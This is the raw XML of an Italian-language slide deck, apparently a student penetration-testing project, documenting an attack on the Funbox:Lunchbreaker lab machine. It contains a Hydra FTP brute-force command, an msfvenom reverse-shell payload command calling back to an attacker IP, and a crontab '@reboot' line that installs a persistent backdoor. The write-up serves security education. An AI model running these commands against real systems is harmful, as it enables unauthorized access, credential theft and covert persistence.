              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>hostname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> e username per accedere alla macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>Lunchbreacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>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A5B4BF-5A28-CDCE-BA34-7D02B7E0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280" y="1998256"/>
            <a:ext cx="3881439" cy="1796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A430D3-7198-6ABE-92F8-6EAE6F36F198}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292867" y="4059193"/>
            <a:ext cx="881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Proviamo a scoprire la password associata all’utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>jane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>utilizzando il tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, attraverso l’esecuzione del comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> -V -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>jane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> -P /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>/rockyou.txt ftp://10.0.2.4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7ACC38-F39B-8AB9-C482-C72AFAD1A214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9134168" y="4520858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V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>: mostra ogni tentativo di login effettuato;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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>: indica il nome utente su cui sferrare l’attacco;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>: percorso del file contenente le password.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0FC2853C-74CE-CD91-91DE-C06EC801E0E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7256819" y="3428338"/>
            <a:ext cx="323165" cy="34315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676E1B7D-56E4-6047-F97A-677C27498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67" y="5539221"/>
            <a:ext cx="6928534" cy="8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8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Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t> Escalation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18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Una volta effettuato l’accesso al server FTP con le credenziali di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>jane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>, ci spostiamo nella cartella home e, per scoprire gli utenti restanti, eseguiamo il comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> -la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63399C1-AB9E-633F-3186-6E25D5AA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41" y="2434107"/>
            <a:ext cx="5589678" cy="21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9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Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t> Escalation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19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Usando nuovamente Hydra, riusciamo a ricavare la password associata all’utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>jules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Effettuiamo l’accesso ad FTP e scopriamo il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0"/>
              <a:t>.backups </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>che contiene 4 file di password, due dei quali vuoti.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C4F78C4-C050-B893-D050-EA7BA929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923" y="2182139"/>
            <a:ext cx="4670987" cy="29594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09585A-8F0A-4CEB-9773-C15950BC7D23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292867" y="5427406"/>
            <a:ext cx="960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Decidiamo di salvare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1"/>
              <a:t>bad-passwds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0"/>
              <a:t>.good-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>sul nostro PC locale.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131183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rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Sommario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto immagine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18045" y="1554582"/>
            <a:ext cx="4063292" cy="3217333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Target Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Target &amp; Port Scanning </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Target Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>PostExploitation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it-IT" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Elemento grafico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Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t> Escalation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A6A79D-6FA3-4776-8DAB-38BD89064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lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" noProof="0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20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Per quanto riguarda l’utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>john</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>, sostituiamo il file in cui effettuare la ricerca con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>bad-passwds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>ed otteniamo la password associata a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>john</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>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882D3F-83BB-75DE-7771-E48EC848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029" y="2090791"/>
            <a:ext cx="5581939" cy="36933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2CB217-AD93-4D46-5AE5-381EE3D39019}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292866" y="2676673"/>
            <a:ext cx="960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Attraverso le credenziali di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>john</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> riusciamo a connetterci, oltre che a FTP, anche al server SSH.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B084718-46C8-F90A-EDE0-AA5FF59C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37" y="3011154"/>
            <a:ext cx="4767485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Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t> Escalation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21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Attraverso l’esecuzione del comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0"/>
              <a:t> –la</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>, scopriamo l’esistenza della cartella </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>todo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>che ha all’interno il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>todo.list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Aprendo quest’ultimo, appare una frase che indica il fatto che l’utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> ha la stessa password dell’user corrente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Decidiamo, quindi, di effettuare l’accesso come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> utilizzando la password di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>john</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>. Il login va a buon fine e, eseguendo il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1"/>
              <a:t>root.flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, riusciamo anche a vincere la sfida.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7E7D631-ACC0-7A05-007E-09EAE1C3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2" y="2930524"/>
            <a:ext cx="5106935" cy="32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Maintaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t> Access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22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Installiamo una backdoor persistente per poter accedere più facilmente alla macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1"/>
              <a:t>Lunchbreaker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, senza dover andare a ripetere l’intero processo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Attraverso l’utilizzo del tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, generiamo il payload di una reverse shell con il comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>/x86/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> LHOST=10.0.2.15 LPORT=4444 -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>shell.elf</a:t>
            </a:r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22AFA3-54BC-8CA9-BE6D-413D79965639}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8246807" y="2512778"/>
            <a:ext cx="31069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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>: specifica il payload da utilizzare;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LHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>: indirizzo IP macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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LPORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>: porta su cui ci si mette in ascolto;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f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>: formato del file di output;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o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>: nome del file di output.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095ECB8F-02B9-9965-B08D-47C261FF93E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="2"/>
            <a:endCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6655878" y="1952901"/>
            <a:ext cx="1031052" cy="21508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2E3B72-08C3-9CF9-4CB5-775658971F31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292867" y="4899220"/>
            <a:ext cx="593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Nella macchina target creiamo, nella directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, uno script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>in.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>contenente il payload.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183833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164487"/>
            <a:ext cx="4980113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PostExploitation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" err="1"/>
              <a:t>Maintaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t> Access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23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9" y="1312449"/>
            <a:ext cx="960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Successivamente, utilizziamo il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> –e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> per editare il file in cui sono indicati i comandi pianificati. Aggiungiamo al file la seguente riga:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>@reboot /etc/in.sh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2E3B72-08C3-9CF9-4CB5-775658971F31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292867" y="2782669"/>
            <a:ext cx="960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questo modo ad ogni avvio, la macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Lunchbreaker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> tenterà di instaurare una connessione con la macchina attaccante che dovrà essere messa in ascolto sulla porta 4444.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1261A59-AE26-8744-8110-43A1AEB5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026" y="3449859"/>
            <a:ext cx="5055908" cy="14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rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Conclusioni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FC3670-CE6C-4149-800C-ED198FC2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3863749" cy="404446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Durante l’analisi della macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1"/>
              <a:t>Funbox:Lunchbreaker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, sono state riscontrate diverse vulnerabilità che la espongono ad attacchi di utenti malintenzionati. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Un ruolo fondamentale è svolto dalla vulnerabilità </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Anonymous FTP Login Reporting, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>che ci è stata utile per ottenere l’accesso alla macchina target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Possiamo concludere che la macchina ha un livello di sicurezza molto basso.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="Segnaposto immagine 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{771EED1D-F177-4F26-9BF3-74717177BC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090426" y="86636"/>
            <a:ext cx="2952748" cy="2952748"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="Segnaposto immagine 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24E25DA2-AA49-400A-8535-7267DFF67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682545" y="3175909"/>
            <a:ext cx="3454390" cy="3454390"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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B0573956-0AA9-4FDF-8CDA-AC7558A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5EA792F7-1D9E-4C7E-A103-E8EDFDC2691E}" type="slidenum">
              <a:rPr lang="it-IT" noProof="0" smtClean="0"/>
              <a:pPr lvl="0" rtl="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Elemento grafico 185">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62ECD7B8-E70F-4597-823C-6C0A5EC4F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2464" y="1799431"/>
            <a:ext cx="4203323" cy="2927350"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" spc="300" dirty="0"/>
              <a:t>GRAZIE PER L’ATTENZIONE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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1537BDD2-04FD-449B-AD72-208CDFEE8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38201" y="1149350"/>
            <a:ext cx="5246688" cy="4227513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F3450C42-9A0B-4425-92C2-70FCF7C45734}" type="slidenum">
              <a:rPr lang="it-IT" noProof="0" smtClean="0"/>
              <a:pPr lvl="0" rtl="0"/>
              <a:t>25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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Introduzione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Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>è un processo che permette di valutare la sicurezza di un determinato asset (rete, sistema informatico, ecc.) replicando i comportamenti di un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>black </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> hacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Per il progetto scelto, come metodologia di riferimento, è stato seguito il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Framework Generale per il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> Testing(FGPT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, tralasciando le fasi di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0"/>
              <a:t>Target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1"/>
              <a:t>Scoping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>e di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0"/>
              <a:t>Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1"/>
              <a:t>Gathering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>.</a:t>
            </a:r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D4A20C46-A075-4415-A172-F3722C0ADE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235389" y="1963482"/>
            <a:ext cx="4114799" cy="2931036"/>
          </a:xfr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Introduzione</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t>Strumenti utilizzati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595" y="4372987"/>
            <a:ext cx="2266410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Macchina Attaccante</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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EA792F7-1D9E-4C7E-A103-E8EDFDC2691E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BD7698-051A-9104-D19B-90BA693A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19" y="2191242"/>
            <a:ext cx="1763762" cy="1772669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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39E0742B-B5A7-4CCA-A690-D0964CAD2E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0473" y="4372985"/>
            <a:ext cx="1864932" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>Macchina Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto immagine 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9B4EF12-1342-CDFD-8562-BB26BF89261C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4842576" y="4372986"/>
            <a:ext cx="2908326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Ambiente di virtualizzazione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68B9BD-957C-D2DB-1195-00E174718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597" y="2191242"/>
            <a:ext cx="1786283" cy="17862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62EA4E-7997-1D3D-FAFC-16B7E23C2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90" y="1571473"/>
            <a:ext cx="1908697" cy="27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1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164487"/>
            <a:ext cx="4150804" cy="1431000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Target Discovery</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t>Indirizzo IP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AF735B0-B62B-4999-B4B5-A783FC1BD4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3167" y="2149809"/>
            <a:ext cx="2861010" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="18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netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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-r 10.0.2.0/24</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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518C6B7-20BA-4142-996A-BE121D6535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2868" y="4746526"/>
